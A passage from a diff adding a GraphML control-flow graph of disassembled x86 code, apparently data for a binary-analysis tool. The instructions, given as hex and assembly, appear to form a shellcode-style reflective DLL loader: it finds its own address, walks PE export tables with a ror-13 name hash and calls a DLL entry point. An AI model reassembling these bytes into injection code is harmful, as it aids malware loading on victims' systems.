+          <data key="address">0x13a0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">59</data>
+          <data key="instruction.source">pop ecx</data>
+        </node>
+        <node id="block.0x13a0:instruction.0x13a1">
+          <data key="address">0x13a1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb63401</data>
+          <data key="instruction.source">movzx esi, byte ptr [ecx + eax]</data>
+        </node>
+        <node id="block.0x13a0:instruction.0x13a5">
+          <data key="address">0x13a5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb00</data>
+          <data key="instruction.source">jmp 0x13a7</data>
+        </node>
+        <edge source="block.0x13a0:instruction.0x13a0" target="block.0x13a0:instruction.0x13a1"/>
+      </graph>
+    </node>
+    <node id="block.0x13a7">
+      <data key="address">0x13a7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13a7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13a7:instruction.0x13a7">
+          <data key="address">0x13a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83ec0c</data>
+          <data key="instruction.source">sub esp, 0xc</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13aa">
+          <data key="address">0x13aa</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b430c</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 0xc]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13ad">
+          <data key="address">0x13ad</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13b0">
+          <data key="address">0x13b0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">890424</data>
+          <data key="instruction.source">mov dword ptr [esp], eax</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13b3">
+          <data key="address">0x13b3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4308</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 8]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13b6">
+          <data key="address">0x13b6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89442404</data>
+          <data key="instruction.source">mov dword ptr [esp + 4], eax</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13ba">
+          <data key="address">0x13ba</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c744240800000000</data>
+          <data key="instruction.source">mov dword ptr [esp + 8], 0</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13c2">
+          <data key="address">0x13c2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d442408</data>
+          <data key="instruction.source">lea eax, [esp + 8]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13c6">
+          <data key="address">0x13c6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13c7">
+          <data key="address">0x13c7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">56</data>
+          <data key="instruction.source">push esi</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13c8">
+          <data key="address">0x13c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d44240c</data>
+          <data key="instruction.source">lea eax, [esp + 0xc]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13cc">
+          <data key="address">0x13cc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13cd">
+          <data key="address">0x13cd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d44240c</data>
+          <data key="instruction.source">lea eax, [esp + 0xc]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13d1">
+          <data key="address">0x13d1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13d2">
+          <data key="address">0x13d2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6aff</data>
+          <data key="instruction.source">push -1</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13d4">
+          <data key="address">0x13d4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55b4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x4c]</data>
+        </node>
+        <node id="block.0x13a7:instruction.0x13d7">
+          <data key="address">0x13d7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e83a000000</data>
+          <data key="instruction.source">call 0x1416</data>
+        </node>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13ad"/>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13b0"/>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13b6"/>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13ba"/>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13c2"/>
+        <edge source="block.0x13a7:instruction.0x13a7" target="block.0x13a7:instruction.0x13c6"/>
+        <edge source="block.0x13a7:instruction.0x13aa" target="block.0x13a7:instruction.0x13ad"/>
+        <edge source="block.0x13a7:instruction.0x13aa" target="block.0x13a7:instruction.0x13b0"/>
+        <edge source="block.0x13a7:instruction.0x13ad" target="block.0x13a7:instruction.0x13b0"/>
+        <edge source="block.0x13a7:instruction.0x13ad" target="block.0x13a7:instruction.0x13b3"/>
+        <edge source="block.0x13a7:instruction.0x13b0" target="block.0x13a7:instruction.0x13b3"/>
+        <edge source="block.0x13a7:instruction.0x13b0" target="block.0x13a7:instruction.0x13c6"/>
+        <edge source="block.0x13a7:instruction.0x13b3" target="block.0x13a7:instruction.0x13b6"/>
+        <edge source="block.0x13a7:instruction.0x13b3" target="block.0x13a7:instruction.0x13c2"/>
+        <edge source="block.0x13a7:instruction.0x13b6" target="block.0x13a7:instruction.0x13c2"/>
+        <edge source="block.0x13a7:instruction.0x13b6" target="block.0x13a7:instruction.0x13c6"/>
+        <edge source="block.0x13a7:instruction.0x13ba" target="block.0x13a7:instruction.0x13c6"/>
+        <edge source="block.0x13a7:instruction.0x13c2" target="block.0x13a7:instruction.0x13c6"/>
+        <edge source="block.0x13a7:instruction.0x13c2" target="block.0x13a7:instruction.0x13c8"/>
+        <edge source="block.0x13a7:instruction.0x13c6" target="block.0x13a7:instruction.0x13c7"/>
+        <edge source="block.0x13a7:instruction.0x13c6" target="block.0x13a7:instruction.0x13c8"/>
+        <edge source="block.0x13a7:instruction.0x13c7" target="block.0x13a7:instruction.0x13c8"/>
+        <edge source="block.0x13a7:instruction.0x13c7" target="block.0x13a7:instruction.0x13cc"/>
+        <edge source="block.0x13a7:instruction.0x13c8" target="block.0x13a7:instruction.0x13cc"/>
+        <edge source="block.0x13a7:instruction.0x13c8" target="block.0x13a7:instruction.0x13cd"/>
+        <edge source="block.0x13a7:instruction.0x13cc" target="block.0x13a7:instruction.0x13cd"/>
+        <edge source="block.0x13a7:instruction.0x13cc" target="block.0x13a7:instruction.0x13d1"/>
+        <edge source="block.0x13a7:instruction.0x13cd" target="block.0x13a7:instruction.0x13d1"/>
+        <edge source="block.0x13a7:instruction.0x13d1" target="block.0x13a7:instruction.0x13d2"/>
+        <edge source="block.0x13a7:instruction.0x13d2" target="block.0x13a7:instruction.0x13d4"/>
+        <edge source="block.0x13a7:instruction.0x13d2" target="block.0x13a7:instruction.0x13d7"/>
+        <edge source="block.0x13a7:instruction.0x13d4" target="block.0x13a7:instruction.0x13d7"/>
+      </graph>
+    </node>
+    <node id="block.0x13dc">
+      <data key="address">0x13dc</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13dc</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13dc:instruction.0x13dc">
+          <data key="address">0x13dc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c40c</data>
+          <data key="instruction.source">add esp, 0xc</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x13df">
+      <data key="address">0x13df</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13df</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13df:instruction.0x13df">
+          <data key="address">0x13df</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345c428</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x3c], 0x28</data>
+        </node>
+        <node id="block.0x13df:instruction.0x13e3">
+          <data key="address">0x13e3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff4dcc</data>
+          <data key="instruction.source">dec dword ptr [ebp - 0x34]</data>
+        </node>
+        <node id="block.0x13df:instruction.0x13e6">
+          <data key="address">0x13e6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb9a</data>
+          <data key="instruction.source">jmp 0x1382</data>
+        </node>
+        <edge source="block.0x13df:instruction.0x13df" target="block.0x13df:instruction.0x13e3"/>
+        <edge source="block.0x13df:instruction.0x13e3" target="block.0x13df:instruction.0x13e6"/>
+      </graph>
+    </node>
+    <node id="block.0x13e8">
+      <data key="address">0x13e8</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13e8</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13e8:instruction.0x13e8">
+          <data key="address">0x13e8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4de8</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13eb">
+          <data key="address">0x13eb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [ecx + 0x3c]</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13ee">
+          <data key="address">0x13ee</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c8</data>
+          <data key="instruction.source">add eax, ecx</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13f0">
+          <data key="address">0x13f0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4028</data>
+          <data key="instruction.source">mov eax, dword ptr [eax + 0x28]</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13f3">
+          <data key="address">0x13f3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13f6">
+          <data key="address">0x13f6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x3c], eax</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13f9">
+          <data key="address">0x13f9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a00</data>
+          <data key="instruction.source">push 0</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13fb">
+          <data key="address">0x13fb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a00</data>
+          <data key="instruction.source">push 0</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13fd">
+          <data key="address">0x13fd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6aff</data>
+          <data key="instruction.source">push -1</data>
+        </node>
+        <node id="block.0x13e8:instruction.0x13ff">
+          <data key="address">0x13ff</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f0</data>
+          <data key="instruction.source">call dword ptr [ebp - 0x10]</data>
+        </node>
+        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13eb"/>
+        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13ee"/>
+        <edge source="block.0x13e8:instruction.0x13e8" target="block.0x13e8:instruction.0x13f9"/>
+        <edge source="block.0x13e8:instruction.0x13eb" target="block.0x13e8:instruction.0x13ee"/>
+        <edge source="block.0x13e8:instruction.0x13eb" target="block.0x13e8:instruction.0x13f6"/>
+        <edge source="block.0x13e8:instruction.0x13ee" target="block.0x13e8:instruction.0x13f0"/>
+        <edge source="block.0x13e8:instruction.0x13ee" target="block.0x13e8:instruction.0x13f3"/>
+        <edge source="block.0x13e8:instruction.0x13f0" target="block.0x13e8:instruction.0x13f3"/>
+        <edge source="block.0x13e8:instruction.0x13f0" target="block.0x13e8:instruction.0x13f6"/>
+        <edge source="block.0x13e8:instruction.0x13f3" target="block.0x13e8:instruction.0x13f6"/>
+        <edge source="block.0x13e8:instruction.0x13f3" target="block.0x13e8:instruction.0x13f9"/>
+        <edge source="block.0x13e8:instruction.0x13f6" target="block.0x13e8:instruction.0x13f9"/>
+        <edge source="block.0x13e8:instruction.0x13f9" target="block.0x13e8:instruction.0x13fb"/>
+        <edge source="block.0x13e8:instruction.0x13fb" target="block.0x13e8:instruction.0x13fd"/>
+        <edge source="block.0x13e8:instruction.0x13fd" target="block.0x13e8:instruction.0x13ff"/>
+      </graph>
+    </node>
+    <node id="block.0x1402">
+      <data key="address">0x1402</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1402</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1402:instruction.0x1402">
+          <data key="address">0x1402</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a00</data>
+          <data key="instruction.source">push 0</data>
+        </node>
+        <node id="block.0x1402:instruction.0x1404">
+          <data key="address">0x1404</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a01</data>
+          <data key="instruction.source">push 1</data>
+        </node>
+        <node id="block.0x1402:instruction.0x1406">
+          <data key="address">0x1406</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff75e8</data>
+          <data key="instruction.source">push dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x1402:instruction.0x1409">
+          <data key="address">0x1409</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55c4</data>
+          <data key="instruction.source">call dword ptr [ebp - 0x3c]</data>
+        </node>
+        <edge source="block.0x1402:instruction.0x1402" target="block.0x1402:instruction.0x1404"/>
+        <edge source="block.0x1402:instruction.0x1404" target="block.0x1402:instruction.0x1406"/>
+        <edge source="block.0x1402:instruction.0x1406" target="block.0x1402:instruction.0x1409"/>
+      </graph>
+    </node>
+    <node id="block.0x140c">
+      <data key="address">0x140c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x140c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x140c:instruction.0x140c">
+          <data key="address">0x140c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45c4</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x140c:instruction.0x140f">
+          <data key="address">0x140f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5f</data>
+          <data key="instruction.source">pop edi</data>
+        </node>
+        <node id="block.0x140c:instruction.0x1410">
+          <data key="address">0x1410</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5e</data>
+          <data key="instruction.source">pop esi</data>
+        </node>
+        <node id="block.0x140c:instruction.0x1411">
+          <data key="address">0x1411</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5b</data>
+          <data key="instruction.source">pop ebx</data>
+        </node>
+        <node id="block.0x140c:instruction.0x1412">
+          <data key="address">0x1412</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89ec</data>
+          <data key="instruction.source">mov esp, ebp</data>
+        </node>
+        <node id="block.0x140c:instruction.0x1414">
+          <data key="address">0x1414</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5d</data>
+          <data key="instruction.source">pop ebp</data>
+        </node>
+        <node id="block.0x140c:instruction.0x1415">
+          <data key="address">0x1415</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+        <edge source="block.0x140c:instruction.0x140c" target="block.0x140c:instruction.0x1414"/>
+        <edge source="block.0x140c:instruction.0x140f" target="block.0x140c:instruction.0x1410"/>
+        <edge source="block.0x140c:instruction.0x1410" target="block.0x140c:instruction.0x1411"/>
+        <edge source="block.0x140c:instruction.0x1411" target="block.0x140c:instruction.0x1412"/>
+        <edge source="block.0x140c:instruction.0x1412" target="block.0x140c:instruction.0x1414"/>
+        <edge source="block.0x140c:instruction.0x1414" target="block.0x140c:instruction.0x1415"/>
+      </graph>
+    </node>
+    <node id="block.0x1416">
+      <data key="address">0x1416</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1416</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1416:instruction.0x1416">
+          <data key="address">0x1416</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4201</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 1]</data>
+        </node>
+        <node id="block.0x1416:instruction.0x1419">
+          <data key="address">0x1419</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d5205</data>
+          <data key="instruction.source">lea edx, [edx + 5]</data>
+        </node>
+        <node id="block.0x1416:instruction.0x141c">
+          <data key="address">0x141c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ffe2</data>
+          <data key="instruction.source">jmp edx</data>
+        </node>
+        <edge source="block.0x1416:instruction.0x1416" target="block.0x1416:instruction.0x1419"/>
+        <edge source="block.0x1416:instruction.0x1419" target="block.0x1416:instruction.0x141c"/>
+      </graph>
+    </node>
+    <node id="block.0x141e">
+      <data key="address">0x141e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x141e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x141e:instruction.0x141e">
+          <data key="address">0x141e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e8</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1421">
+          <data key="address">0x1421</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b423c</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1424">
+          <data key="address">0x1424</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d0</data>
+          <data key="instruction.source">add eax, edx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1426">
+          <data key="address">0x1426</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4078</data>
+          <data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1429">
+          <data key="address">0x1429</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d0</data>
+          <data key="instruction.source">add eax, edx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x142b">
+          <data key="address">0x142b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945e0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x20], eax</data>
+        </node>
+        <node id="block.0x141e:instruction.0x142e">
+          <data key="address">0x142e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4818</data>
+          <data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1431">
+          <data key="address">0x1431</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">894dc8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x38], ecx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1434">
+          <data key="address">0x1434</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4820</data>
+          <data key="instruction.source">mov ecx, dword ptr [eax + 0x20]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1437">
+          <data key="address">0x1437</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d1</data>
+          <data key="instruction.source">add ecx, edx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1439">
+          <data key="address">0x1439</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">894ddc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x24], ecx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x143c">
+          <data key="address">0x143c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4824</data>
+          <data key="instruction.source">mov ecx, dword ptr [eax + 0x24]</data>
+        </node>
+        <node id="block.0x141e:instruction.0x143f">
+          <data key="address">0x143f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d1</data>
+          <data key="instruction.source">add ecx, edx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1441">
+          <data key="address">0x1441</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">894dd8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x28], ecx</data>
+        </node>
+        <node id="block.0x141e:instruction.0x1444">
+          <data key="address">0x1444</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1421"/>
+        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1424"/>
+        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1429"/>
+        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x1437"/>
+        <edge source="block.0x141e:instruction.0x141e" target="block.0x141e:instruction.0x143f"/>
+        <edge source="block.0x141e:instruction.0x1421" target="block.0x141e:instruction.0x1424"/>
+        <edge source="block.0x141e:instruction.0x1421" target="block.0x141e:instruction.0x142b"/>
+        <edge source="block.0x141e:instruction.0x1424" target="block.0x141e:instruction.0x1426"/>
+        <edge source="block.0x141e:instruction.0x1424" target="block.0x141e:instruction.0x1429"/>
+        <edge source="block.0x141e:instruction.0x1426" target="block.0x141e:instruction.0x1429"/>
+        <edge source="block.0x141e:instruction.0x1426" target="block.0x141e:instruction.0x142b"/>
+        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x142b"/>
+        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x142e"/>
+        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x1434"/>
+        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x1437"/>
+        <edge source="block.0x141e:instruction.0x1429" target="block.0x141e:instruction.0x143c"/>
+        <edge source="block.0x141e:instruction.0x142b" target="block.0x141e:instruction.0x142e"/>
+        <edge source="block.0x141e:instruction.0x142e" target="block.0x141e:instruction.0x1431"/>
+        <edge source="block.0x141e:instruction.0x142e" target="block.0x141e:instruction.0x1434"/>
+        <edge source="block.0x141e:instruction.0x1431" target="block.0x141e:instruction.0x1434"/>
+        <edge source="block.0x141e:instruction.0x1434" target="block.0x141e:instruction.0x1437"/>
+        <edge source="block.0x141e:instruction.0x1434" target="block.0x141e:instruction.0x1439"/>
+        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x1439"/>
+        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x143c"/>
+        <edge source="block.0x141e:instruction.0x1437" target="block.0x141e:instruction.0x143f"/>
+        <edge source="block.0x141e:instruction.0x1439" target="block.0x141e:instruction.0x143c"/>
+        <edge source="block.0x141e:instruction.0x143c" target="block.0x141e:instruction.0x143f"/>
+        <edge source="block.0x141e:instruction.0x143c" target="block.0x141e:instruction.0x1441"/>
+        <edge source="block.0x141e:instruction.0x143f" target="block.0x141e:instruction.0x1441"/>
+        <edge source="block.0x141e:instruction.0x1441" target="block.0x141e:instruction.0x1444"/>
+      </graph>
+    </node>
+    <node id="block.0x1445">
+      <data key="address">0x1445</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1445</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1445:instruction.0x1445">
+          <data key="address">0x1445</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">b800000000</data>
+          <data key="instruction.source">mov eax, 0</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x144a">
+      <data key="address">0x144a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x144a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x144a:instruction.0x144a">
+          <data key="address">0x144a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb619</data>
+          <data key="instruction.source">movzx ebx, byte ptr [ecx]</data>
+        </node>
+        <node id="block.0x144a:instruction.0x144d">
+          <data key="address">0x144d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85db</data>
+          <data key="instruction.source">test ebx, ebx</data>
+        </node>
+        <node id="block.0x144a:instruction.0x144f">
+          <data key="address">0x144f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7408</data>
+          <data key="instruction.source">je 0x1459</data>
+        </node>
+        <edge source="block.0x144a:instruction.0x144a" target="block.0x144a:instruction.0x144d"/>
+        <edge source="block.0x144a:instruction.0x144d" target="block.0x144a:instruction.0x144f"/>
+      </graph>
+    </node>
+    <node id="block.0x1451">
+      <data key="address">0x1451</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1451</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1451:instruction.0x1451">
+          <data key="address">0x1451</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1c80d</data>
+          <data key="instruction.source">ror eax, 0xd</data>
+        </node>
+        <node id="block.0x1451:instruction.0x1454">
+          <data key="address">0x1454</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d8</data>
+          <data key="instruction.source">add eax, ebx</data>
+        </node>
+        <node id="block.0x1451:instruction.0x1456">
+          <data key="address">0x1456</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41</data>
+          <data key="instruction.source">inc ecx</data>
+        </node>
+        <node id="block.0x1451:instruction.0x1457">
+          <data key="address">0x1457</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebf1</data>
+          <data key="instruction.source">jmp 0x144a</data>
+        </node>
+        <edge source="block.0x1451:instruction.0x1451" target="block.0x1451:instruction.0x1454"/>
+        <edge source="block.0x1451:instruction.0x1454" target="block.0x1451:instruction.0x1456"/>
+        <edge source="block.0x1451:instruction.0x1456" target="block.0x1451:instruction.0x1457"/>
+      </graph>
+    </node>
+    <node id="block.0x1459">
+      <data key="address">0x1459</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1459</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1459:instruction.0x1459">
+          <data key="address">0x1459</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c3</data>
+          <data key="instruction.source">ret</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x145a">
+      <data key="address">0x145a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x145a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x145a:instruction.0x145a">
+          <data key="address">0x145a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e841ffffff</data>
+          <data key="instruction.source">call 0x13a0</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x145f">
+      <data key="address">0x145f</data>
+      <data key="type">data</data>
+      <data key="data.hex">0110022004400440</data>
+    </node>
+    <edge source="block.0x1000" target="block.0x1020"/>
+    <edge source="block.0x1020" target="block.0x1025"/>
+    <edge source="block.0x1025" target="block.0x102c"/>
+    <edge source="block.0x102c" target="block.0x1033"/>
+    <edge source="block.0x1033" target="block.0x103b"/>
+    <edge source="block.0x103b" target="block.0x1042"/>
+    <edge source="block.0x1042" target="block.0x104b"/>
+    <edge source="block.0x104b" target="block.0x1053"/>
+    <edge source="block.0x1053" target="block.0x1062"/>
+    <edge source="block.0x1062" target="block.0x106a"/>
+    <edge source="block.0x106a" target="block.0x1079"/>
+    <edge source="block.0x1079" target="block.0x1081"/>
+    <edge source="block.0x1081" target="block.0x108c"/>
+    <edge source="block.0x108c" target="block.0x108f"/>
+    <edge source="block.0x108f" target="block.0x1095"/>
+    <edge source="block.0x1095" target="block.0x109d"/>
+    <edge source="block.0x109d" target="block.0x10a9"/>
+    <edge source="block.0x10a9" target="block.0x10ae"/>
+    <edge source="block.0x10ae" target="block.0x10bc"/>
+    <edge source="block.0x10bc" target="block.0x10c3"/>
+    <edge source="block.0x10c3" target="block.0x10ce"/>
+    <edge source="block.0x10ce" target="block.0x10df"/>
+    <edge source="block.0x10df" target="block.0x10e9"/>
+    <edge source="block.0x10e9" target="block.0x10f0"/>
+    <edge source="block.0x10f0" target="block.0x10f2"/>
+    <edge source="block.0x10f2" target="block.0x1111"/>
+    <edge source="block.0x1111" target="block.0x1116"/>
+    <edge source="block.0x1116" target="block.0x1119"/>
+    <edge source="block.0x1119" target="block.0x1128"/>
+    <edge source="block.0x1128" target="block.0x1132"/>
+    <edge source="block.0x1132" target="block.0x1140"/>
+    <edge source="block.0x1140" target="block.0x1147"/>
+    <edge source="block.0x1147" target="block.0x114e"/>
+    <edge source="block.0x114e" target="block.0x115f"/>
+    <edge source="block.0x115f" target="block.0x1169"/>
+    <edge source="block.0x1169" target="block.0x1170"/>
+    <edge source="block.0x1170" target="block.0x1177"/>
+    <edge source="block.0x1177" target="block.0x1179"/>
+    <edge source="block.0x1179" target="block.0x1198"/>
+    <edge source="block.0x1198" target="block.0x119d"/>
+    <edge source="block.0x119d" target="block.0x11a4"/>
+    <edge source="block.0x11a4" target="block.0x11a9"/>
+    <edge source="block.0x11a9" target="block.0x11ac"/>
